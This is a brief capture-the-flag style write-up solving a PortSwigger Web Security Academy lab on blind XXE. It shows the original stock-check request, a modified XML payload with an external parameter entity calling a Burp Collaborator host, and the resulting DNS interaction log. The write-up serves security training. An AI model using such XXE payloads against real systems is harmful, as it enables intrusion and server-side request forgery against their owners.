Skip to content

Port Swigger Blind XXE with out of band interactio 1

Blind XXE with out-of-band interaction via XML parameter entities

Solution

Check stock

POST /product/stock HTTP/2
Host: 0a4b00f4048c1e3781ed70fd001f0070.web-security-academy.net
Cookie: session=ILSFJbp4sO14jFEZ2meU1Ux6LVM2WBbv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a4b00f4048c1e3781ed70fd001f0070.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a4b00f4048c1e3781ed70fd001f0070.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Create payload

Old payload:
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
---
New payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [ <!ENTITY % hack SYSTEM 'http://jczc8ugl97ycu627432hegnmldr4fz3o.oastify.com'>]>
<stockCheck><productId>%hack;</productId><storeId>1</storeId></stockCheck>

Check DNS/HTTP request in Collabolator tab

The Collaborator server received a DNS lookup of type A for the domain name jCZC8uGL97yCU627432heGNMLDr4fZ3o.oASTifY.COM.  The lookup was received from IP address 192.178.65.27:51360 at 2026-Jan-12 13:41:19.584 UTC.

Solved